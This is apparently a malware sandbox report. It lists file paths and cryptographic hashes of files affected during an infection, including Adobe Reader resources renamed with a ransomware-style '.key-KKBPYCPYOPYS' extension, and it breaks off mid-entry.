SHA512 18d847db71b0178f48472803d21e4a656a1b6a3e3da5ed74caece5341ec8aec10a5c20a04de17d17d963d63dba462c5f8eb87a9f0d2a8dcbf01cdae389d101e6

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 29f78f2f9031f9173501a32e861c54bc
SHA1 45ce5043ce54f489bd2352b242e316f1b6fe329b
SHA256 7a59647952e5519589c9506d1a6fe671bb246558009e2666ee34af7f0a8eff43
SHA512 526b2bf46165f840efe5c5f56ff87c7c856bb5e52323d87eac49c738ad0038ed54b8f49fd7c5d915854b19197b0ac697cf95b21b06ec7f475d8b7ee23499e457

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 5d9c4da05ed65bfe06d816f5a721e2be
SHA1 b5c599ed90b9a8ecdb86fd7e457c07bb56da78d3
SHA256 d0d7dc2434880c916ab1042420453a6990efb2e0515d9d5462306c082cc7a0ce
SHA512 d1714c90ee039919627e77f63302b9a3b0a9b5491487f03e0bfb26e7e94d672ffd84e4eedebf72ef8571bc06a09234785ad6d9316008f9ae218e64651d707d59

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 30140eca45f8f9eaab9db748dffd7ce3
SHA1 21b4062b851a40687e9faa5d70e9c1220d36eece
SHA256 580250d9652c9176d5d6e8c83cff5bef76bca57e24a456a8d416a38bf3dfc9e3
SHA512 8363f39a2c794ad56486850e3f25dd78977e5d851da0f6ffdf95c44344b91e36f721886ef09ff7c359ea73113baf413945dc5270456b30b28ae0ee37c2a457c0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 f6aeaae05d2f7a9b5f2943156469cd13
SHA1 eabb3bcd04cf5700cb27668669829c7dec71b60f
SHA256 8bd33b17fa41cee943a1a335af3a42fd678533d05129270bf436005eb20b862b
SHA512 ea34f01f90ac683f505911e509470362d7630272fcf255fc6df240a139d05abfaef7ce71345bc12aa5705782c12f5229222684c405ceec79c1b4d486acb82a34

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 d02e8df5eb5b242a40983d453bfde597
SHA1 f625caa6aa58492ade0341bbcd48ab2ac246ff51
SHA256 cac1f14aa971251a30eafc9871eb9ba8a94924823c02f4038a8818059a4e4c42
SHA512 b6e36c79dffc472eb43344d710a1b6072a6fd384202ebaf2388e1f9ccd37fd91fee5c07a3faed880c59438d3a372e31ddd42f2c99fd4a243a841278e60bf7ed4

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 0e32e77e5ef1f3a3116a253b6c8e8282
SHA1 da9a1556c8bdb97dfda7c35112075efd98b63bbf
SHA256 b679ab0eb6f9ef0315d4d2225ef14cc344d7e13f8a9355b0547dc694d861a00e
SHA512 b498ce6793f4f4e418460198ba9f41e9c5f7a265b89707839540b8f7ba0be69e12494c8ccdaad85922d2fa117088ecdbf327c45591e46346d14bbf9ba2f3a171

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 2105ea29c81aa7822082d7ed83f9fc6d
SHA1 1678a1662f97f0112b5675207abd079a502b3ab6
SHA256 c190673aab34f8908821fed8910e0348dfa40f6c1bcafe6f547baea3dda2f1a8
SHA512 07308ddfb9cdafa6f0602b3c8a851ef50ab0616d8e15948ce57f3a9b172d364f0a70665d45f2a29f6618dad5f79146026da103e8efb691acfc5a40b7ac229522

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 832427448c321f4c7a43531dc5f11216
SHA1 39d641d874b2caed09da869e426482d41f137eb6
SHA256 4fdea97a26cb25a49c99f7f1d0e7bd7df4a77205b2ea6e8bc78e74c164933520
SHA512 de0920486e587784977b2a336d9249fc4e1d7d269208afc5afb7374435a095f6e72103ec76892a31639e93dbe8f67e0c9a667715c094e918dc8473e1398dbd6c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 4e0434993515f634578b89a9dc1ba54c
SHA1 da348e46447d7f973f20328a1d91a7bf90578079
SHA256 14e2059e378ef1b58e0bdc15f33fa75b609c3d5be2cce56536240c6a20ad4c3b
SHA512 87f57722cecd79b72a2c1253a446a4523348501e5ae2f8bc604211f91954e55dc232d912602fb4488cc72408847ebdbc574847327e4d55496d115a653d65181d

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 37b3e0bc3cbaa1bb400d300246f359e3
SHA1 afdcfe6d98fc2a8898024e3b85a31c557e2f03bc
SHA256 a2005a28ed5652dbc103b4a56904a9cad27e4861b207b3886a5e03e32c192c07
SHA512 2c3399c4597fb6c8c8aecdae0a21b7c4b69ec84e045fa18a485b6f8832fc9ae8f2e81489343b7a9afd8d3ec996633df06849f2456c5defe4d6f3a0d91539cbc3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 89a7c31037999e6e3ff910ad65f533dc
SHA1 cabeb4713304bc4b78aafa5af1fa3664753d29ec
SHA256 f1a5d8079057925ce61676a2d00ed699627c5f0f4b853f2eba88aec890226554
SHA512 bb236487b85dac378c3a66f92ef5316a95a33f82f96f86ad04d1706373ea5b7a58957ba0dd70e0b21c85fffbcb00c6afeddefcbb3b1e0bc4871a0926dcf080cf

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 b609f33d21b254018df37322df8c418d
SHA1 3609a9bde9d8327f1c97732fab7963d07f09cde1
SHA256 e93fed3c67b397fad72e4754b749bf88593f1d64217550fb959b8a8ed383eeca
SHA512 e1ffb2fe3095e53c51430cf28ccab0f62b9119e5e96eadc3da039b70878a67c96f45acbd3c8326bb682526e5ebc75f152fc31938c2931d5736656f8d8d306078

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 a058ba0aec8d43d88f7aa8e5750db006
SHA1 f7dab2af6df60a1c6d48d4289e7e398d2182840f
SHA256 4557b67eafeb233ef8d9c72d1175c20805e1b51f8569958b6e178d6b49bfcbc3
SHA512 5665ace355b8ca241715db8b2a98b3f964f96971618758bb47eee1dddf62a2949af1025a9f2d7263d92334cd182398b6e1cf09472bef5495346dd71253dc457e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 d8a327715e40daa454fe9c492c4136e6
SHA1 c9cad077c0bcf121e0ab198ab2259b19e9bc78f8
SHA256 28abff49112c57c3a926afbe92a2cd56fd59dfbf1038f3a195a849f43c0643f7
SHA512 469209557a2560ea3e7c05896d6e3c1b30e98b17a83140fdaf1d5fc75a3a316eb9671cdc6b6d1758a3825887ac21a5c988a5d1210f2860d1d74f5a963e935049

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 ae56df40e10a2ea735fde1d066bcda4c
SHA1 909bf726455de89818551f68def3a984d7f0b89f
SHA256 773e3e06b94fa43d3c1def9d6d8717915bc54513c621bd8c76acffce74285b09
SHA512 1dc2bb177c5b033bdf6f0c154d4b369de6d3f995b3737f9eed525b7d27618e2f7d025af177f44f58d2ede83aa87702e328823a7ad977c0999fa7fc0bed7d9d1e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 45da21e11daff6f2140c806cb5fa642f
SHA1 70d6fd1818f1548905c0771c875644e89bc1895a
SHA256 5427c28d3297608d4e749fc25d68585dfc6760922ff51cacef319801cf290ed0
SHA512 8f7b3a62a744280be6ed4363d7d74cd774bc925b8d89b46d171ab045ca11b7f6af85fbf2eb8e22c3c61dd39d93f2036f27ba0275e7f81dd053c9b89b6b99f039

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 fe979472aca8923ece3fb26fd886e7ac
SHA1 178b4507c1a30cfaac455d55c1bd7bf973436b13
SHA256 96c8647b8329b3a84450ebe108aa877ae6252e8948300c52adfac081a97cbc7d
SHA512 71a53dfc8922909618c70ef6f9500bb352a0b5d53a8cbc120f6a27cf1af2b014eb1fa45a9408227d9457fda2ef7466809674fa27e63eda7f18b6e12c4b3c65f5

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 a8a8f767d48fe805931f5e87bfd8ea8b
SHA1 4d5101fc283036cc58757719b51a7479ff23a856
SHA256 ea98ff96d88084620cc2bdd0c97fd78c00ec7adcd8f052f13b5ecb2b0cb8d46c
SHA512 e0995d771dfaa0535d3d41daaf0361bad8ab42373b79c244fb5ae0dfe5ae4dce3923879cb0355a3c4706ef6cdef81a06c040a6508ad11d10af8f5fe1a58af8ea

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 b0cbb97d6c8d07338436f8a1ac7fec0c
SHA1 cdd2579259781ef821d7f623867afb16214f7318
SHA256 ef312e65f3796dd05546a239dac48e0ec6fc870ec6be8b63db45f9b7060b3206
SHA512 d445b731e07a9f1eeda57ad30c79fd6dc70ae74b5e5db4a84ff79cf4936102e02fe34c14dad592b651f7b577f93a6dc2ef8dd5cfa81ae04bd4d24e79fa09be92

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 c680f02ede52b43b24f605b8002be2c5
SHA1 e4984926042ed1c13223faa8730959fcf933d440
SHA256 f09de78935774600df279c9796f4b960d82d17bf735a23e6eb8378ab3eb03f37
SHA512 afe13b981f209c6f01aeafc3cec50cd26799fdb0bc6a651f7aeae710dba2435e924a784ffd589ec324faa31403e1ebadec11760d792a3efa72ec1e1b3bdf11c7

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USS.jcp

MD5 536267d79e691202b8e21ee9791e763f
SHA1 c901d6a13e59636d387bbfc539618201a8794462
SHA256 8ee57520362a363347b87c8f90b2c15317b0d66d754f1ce5c936d7c974409a0b
SHA512 220289000852b6ee1e6a12359fb508b805b653a4b49eb7b38f65cfcd67bfc64f42a9f4a336676f79ef3938d0fa46b4a930c00efa63bd3c7a9349bf254f85d132

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 b542bd8a32623d5cf1c907db568d46a8
SHA1 49fe96f250aa5f2696a91daf18801418983095e9
SHA256 638ddab398a968ff6098f7ec7b84fb5c6c338b5142185656f987c8b7b7d21146
SHA512 3a7942e6fb9f9d12856bb0cf4356ca948d5fc3aa41a2d7e94859889f5654fb6fc01194b010b375f3d6f8a1ef6a1e91b6f03cddf7baea26c3f609b0dad069af81

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 a6c0790566c6146722b3d0616e11ccca
SHA1 3cfb8c483e1b9df50accef771d6331d7c78ca6cc
SHA256 87da7b10724d337eca9f416c7975f5f8cacfce9f40ff4c7ac6ded5f35e8e26db
SHA512 1b5efa020a1e607f5a6873f2debd2253d790ce805fec973560ca9e3d29ef9cb3babe3dbc9e012905bb8d664221945b9f496f51f106dba82d1aeb8c1e2b21c1ac

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres

MD5 2aa77ae0bcec24142f0f3505852b222a
SHA1 c818f5471b82ee641425834e12cf3ed1e13a10ec
SHA256 a2d8228b02d454a77ad8058ddfa56602e1e95b881dc71bc7dd9dd3bf94476ee7
SHA512 76b711b7eadc304b90ddac1dc60b4316e5079f22be026eba940fd5acb363655c74f462822a42877b4ac6574d00a9974b75d33bbe9a36239db234c01fe805756a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\308046B0AF4A39CB

MD5 0191a80f1e300a5a7af5d6784231dd9d
SHA1 70753f21c7c81dccc1b63f59c559e50ac303de68
SHA256 a01b9af0190fcb8f7d8d0756fe99264d7206e1f4698919ffd634c4297d0843ec
SHA512 430e42a2d96aa4f4c84a3b61680b4b64854df9b0cccb50b7389fef68399d561030fab78f269b829e744d1b1e32df09cf7c974eea10e4f4b9b3a43b49f5814602

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\308046B0AF4A39CB;PrivateBrowsingAUMID

MD5 a86b5d0d4a6ecaedaee39c49dc80a3c1
SHA1 0c686e5164d49dc1fe4cf3c990d21c047cf0829e
SHA256 a8dc9ea66e36e8aa0a9620a12228bc62ba39cf632862f67ec825b7594cdb2757
SHA512 a75e786237d02d1ce666a6ef98e66db53ce696f3481ba01f6f311709ae42c299503d5b6c2cfed95c55310d0639f11038f7b0ecfb6d54bfc59045233006c15ed4

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome

MD5 3f0b6f9c120427797ec49194b7b2684d
SHA1 94b42d47c67f254aed67e13e0fcc3b1dc22763b9
SHA256 c47300de08378a4ab89911e77d5ba068651f04717e85a8d9304be5d9914facae
SHA512 7779115cd1f87e150de121b5af4fccf6ad8acd37443e67649078a53f1cf512a52a737caa2d81d5bd41a20d392f0151de202c609f97328cf748cab2f83875bc23

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\MSEdge

MD5 5998c2059f49770bd20c81c12805b08f
SHA1 c85963f4c05b4ea9a18cdf054abde21385320ebe
SHA256 c325f613d9e1f9e9df1d0bd7db8a3c59f7884d91bd4fa2078cf0509969c8d918
SHA512 814f3a603bedbab272e942040390b285e559662cd94a52a91003ffaa2f5b7d6e4d224e37da9bb755484c659fda9f6c59c0c84fe10892d7df207185598219067a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{30BD9A02-CB9A-93FD-A859-09C8803F2346}

MD5 8ab0ccfe101f2a223bf9fc11f910ec64
SHA1 86a7cf51b399bb786896fb77f59ee8b4844f5afe
SHA256 8cc15be591c4f70f964d3554be30283f925747d09eb71692bf40b8125e2bb68a
SHA512 b862068ea8bdb828186c2bc693b1e99d622a48a82eea13886090c44e17d132ad1a96bae4a96214d9a8abeb22f7c85f4ef25a000cc1bf977fd43e67bf1064a61e

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}

MD5 9f1ff11e31c55a87372e85612ca3c290
SHA1 c94dc58d7e8f070d3eeff5bc8ecb3a2d7008323d
SHA256 0c650065d284a6a0f6a17ce2250214b40219b7082e940689a2cd2948162fd893
SHA512 dd490e167b4455aace73dda6d9ec6b90aee5e5994701c249a44d316b17c3f8a8f5e776e9ecb6d751dfbed8e74743a3f13d95edbbf3b09998e148bfcba1ef721f

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}

MD5 0705d6835877cf0e3c45fc7427647c75
SHA1 b03330cd06f821600bb0323e7c2277311f065f6f
SHA256 b04759fee392d36cc20a319943c4ddac356cd1fbed6223a4961688689350a84e
SHA512 0faaf02180ef6ea2a8a74ab2be7b72be24eff69e5aecdf97bec838a637e7b3efb85ffed32c2e035b2100615e2711cccbe8afe231ec55a7245d00d6c98329d83c

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8ABD94FB-E7D6-84A6-A997-C918EDDE0AE5}

MD5 93a41069c98050e3ea095a2185fddce9
SHA1 92eecf90eb3e8235397bf0574acf0e7405541b26
SHA256 0382664c279fd723231cbef1f76c8592dfa408b3b42dd8f343a21f4e77adc497
SHA512 7a36bcf3ef2c41b5084c36404ce692466934931428f2dcaabb86c2a666cf39b53467161a6d13045eb7a68f31461163d869135aca4c744b9215fbb8891b36fc0d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}

MD5 e799eff0b7816a5587d146f9bb951f1f
SHA1 28f99125424d8e0647ed01a21c378362de181cdb
SHA256 daee10eef8cdad237bee08e5429e529bca3b7a10c1bd76578588108a3a6b272b
SHA512 02ad638295b2a21c3b4367e7f3ef345b81e3ba8c62c61a97ef51b1f102c28b2fd6863f3ca1b3b87051ec95da92c42a8bfcd4e0adf18cebd3de0a2c27a388d563

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}

MD5 2e455b88290024ba91a90deb1f194a19
SHA1 d17027449bffef8c398ff1ffd8fbf078171805ea
SHA256 65afc3f47f89f404bb847eca3c445bcbb15af5fe0905fc050fcb6b6d2f6d00cc
SHA512 1cea9d5922894fe900df5b186af735997cdc2132ccdce5690681f4e55608c5c9dbfd5b072c81453ac7456df7fe6577f55e5f86900363fd3acfafa78dbcd6ac5f

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}

MD5 6ba483c92ecc054466753e522db97936
SHA1 f46a0ed2d9d68a979241974f1588d076f64f68aa
SHA256 25b4c976977835c431d466db710ff3d5861cacc4e77683ec6fd4d5c9d5ae0afd
SHA512 ba9fcc6b649ba53bbead16cc9e47741fbf4abb3d115212b15931d7e759b07a3ddd926042ebc93dc1887dd25dd33044c44bae4fcaf2452217d7d1180b1b269f0b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}

MD5 855718d0bd86e35b1d42ceabdcfc61b3
SHA1 2a6698c8231e2fa27f93fd5141a252a4b06251b1
SHA256 78c940de004462f42d6bd01aaa33cd73f2c3b06652730c385f1f9c4760ac9537
SHA512 bea1a7ac95e76b120c65bce325d87c27d385f992c6b95def100ba50fc4e7eaf13c61c10bd95231046885a17afa1aba3fc4158d095360caa46412ae8b136288b8

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_EXCEL_EXE_15

MD5 2c3d8b38f4706d2bd623310de468a21b
SHA1 43aa3a23be9e599c8df874b631e2291fa0fd5e25
SHA256 eb7c131073394f7824cd2152e9ef1f87bfa7feb09097af42d7a882b3ad7b7ac3
SHA512 45fa14f771adb80eaac8d0bc02e70d9e9e453d27238698c7953de7434c4a182eadad6e7fc908de4e5babd487f9dc917fa3ba67ca599c5889804d948da7fd1fd8

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_ONENOTE_EXE_15

MD5 47c378bdc07ccd57b6e51d03085d0a09
SHA1 5e0bcae2ef2a557ef7b7feb11c032e567347c9e9
SHA256 c8306e51b61f5b4d819bee37f60258378b9605c6787f55cbed76c676bed66322
SHA512 1425b348c230aa7818d08049b57228a27bc591fbbb1a107f153eefc3e313ad12cd3ec3efab0b314795ddf00586a821e98eb042db68d3862ea2cf800a0cadb77a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15

MD5 0e2a09c8b94747fa78ec836b5711c0c0
SHA1 92495421ad887f27f53784c470884802797025ad
SHA256 0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36
SHA512 61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32

MD5 e1aa86a6110404c34e05c063601112ad
SHA1 0680868aee468fce12215d90684c4c7cf7769b34
SHA256 af63b4e541130d09289a3c6852de203f2723792bab7464559459a732d553f8bd
SHA512 fce875b8ab57ae028c3bdd3adc645075babb7244a9c3338abf2ce871e56722c895610ed2001c1c84de34c2837616ba3664839e0985f42ff164b1549e909c07c0

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe

MD5 0d19bea6f0b22383fff2d13e0e6ff0a2
SHA1 416f9bd9d2f0deacc06490fbefe77a6ffc2064a9
SHA256 da3cc596513ca5729f367af635df99081509cf5dcf9f5744090c7cd9fa8e0243
SHA512 e9ee700a8b17396239bc5ea79f384c80e34c7412f5877e4b6214e6748ea291341599880aa5338a9e68a3ab86f2f5263b08193a543be72372eb01da0432ae3308

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe

MD5 a89988784e4640ac2ec71f90ce85b825
SHA1 9e22ce33b9c1fbe81690d7d7b315ce815e72994b
SHA256 679f4056018986fc3f9329155cd3a826ef7bc664bd7cb6dec0ae07a7818ce57a
SHA512 9b82109d2fe226f99d2919672734ca8dfca74b3bc2032b406519ae96e37d33a6ef77be655ae0ba5c54036e3ae3510efe767e5881b17e85b04292b1558387a919

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe

MD5 6f0d8710c462b5955d9d16745bdb1bfd
SHA1 ed0545934a28799ef27dddcc0439d05dc40c47ac
SHA256 342f29784a85f25ec119d85e39267ec57a4c803fbc099f6c5ceb7761f8896cfd
SHA512 404085314a3cf37e8e66aecd314d63ea9711d05c1ecb714d531126e61b7bb9929e59e4a42cb736ddade1ac416d76477881d18b428bfd603fede3e9eeb7b6f8cb

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7-zip_chm

MD5 a62d519be58c4ec079cd825e04c1f4bf
SHA1 91c59ff74e1911d942cdb7a68ebba42f10dc3510
SHA256 9af30e079cc36bdf17fb5fffebbe68b2275616f9513b07e99f15f7065a2d99c6
SHA512 637a0dced1a940af17c47abcdf30dc1a2ab2c1a1f70b9199789670398e87d2c9ad445f82e05fd1ea84cccfb62d25c8253218426c1fd9784b14dd5c7bae881b69

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_VideoLAN_VLC_NEWS_txt

MD5 968e7d1aa993ef1052b35a95c51946d5
SHA1 c67817521eb4f70d692d3d29b32676b1871e3d40
SHA256 719fb4e7016e1c4fff64166a8809a6ffe5d16ba0a40e4e8593ba7f664337e239
SHA512 3382a01b518c38859c1ffc8799aacb941fd7bedd2cecaab4fc8e7fe8e44aeb6acf3997b844b9b5d8ddf4e72331e33972606cab1e9d8b527bf80ef7a9a0136022

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_VideoLAN_VLC_Documentation_url

MD5 bad093419be1135cfe9694ea77088c78
SHA1 76204c7ca72cf666add9c9931389d635c82e8af0
SHA256 136808af50ee73df9befd76f7aca21765782565b0095227c5a287f3be0b5ef3c
SHA512 3b5cb7f80d7cbc557b5a32a995cd607257ac8e56af935ce6f64c54ba1f311a65ef00c69c69047b6eb7bb678c2b1bc0a3c37548aef417ea49e414e1a34bcf651d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe

MD5 988d8f7a55d7a70d764dfa515a4ec6cd
SHA1 0935b33593ae55a70833624fbb1edd7208391ff7
SHA256 db1ddddf683c53435b987f49f5f5b3262899451c634298bafb3a0b122ceaa62a
SHA512 3ea0e33b836e1cd0b8d034f1e4d31cfbccad59332cdfd0cfbf08005c32204ff930c5578350fd1ac111f109b1ae38d3621394227cbb1da11d64af4e46735789c8

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7zFM_exe

MD5 0e6ef93d5933046a62bc747ea00e24fe
SHA1 dd78782d47f49c2d8bb903a87596b84cf1299601
SHA256 5086deb58d1ef6e262c226c1c9f590280ba09484995da092ee1c9e0e5bcdc6c5
SHA512 e7db0b2a9f8d1c3dc26ea5360a34959de95449cc6575ec199c4d01e487af627b7c9e2eb60166905011eb53a96d4e7076530ac5e429b3a3c47eb610b63fb089bd

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc

MD5 5e2da008f38c7ad813d9fe8e669dddd6
SHA1 3f4ed852167cfb251cce13be4906a0cbea58f021
SHA256 0cf904a532ac487f6b4c080fd01406529ad26ae559128b0aff170f389c278c28
SHA512 8d295af13fa38384923e0db043ef7196ae3cdddc9dc1e765217494461c6c6f24704eb984985c45159cae06e81ca857c4f406b1ec80bc9c8fbccad535a1f77d72

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe

MD5 53397b08309ff534a07d24635ba224ca
SHA1 acb7765998078026e0b6ffbe57e72d8d454bc54c
SHA256 5c62803659067e9c56afca377104d8f187d0393f629ecd6863fb165cff588ad0
SHA512 bdfd047f5678f72e612875b69f1944b9afd94cc6b61740ff32380a22e37b9b86ca59efe52b7a58358c15f75ae7c04221a48060d1c0f338cf40c156f9187501d1

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe

MD5 7794df1f7ea502f8b5a7afe7458dcbd4
SHA1 179f413597c837600e87609de63ae9112e3e7199
SHA256 75f6713e1ae6f0caa52d0b3957114d7653e2e002b33e1c6b173f6a584ead94e4
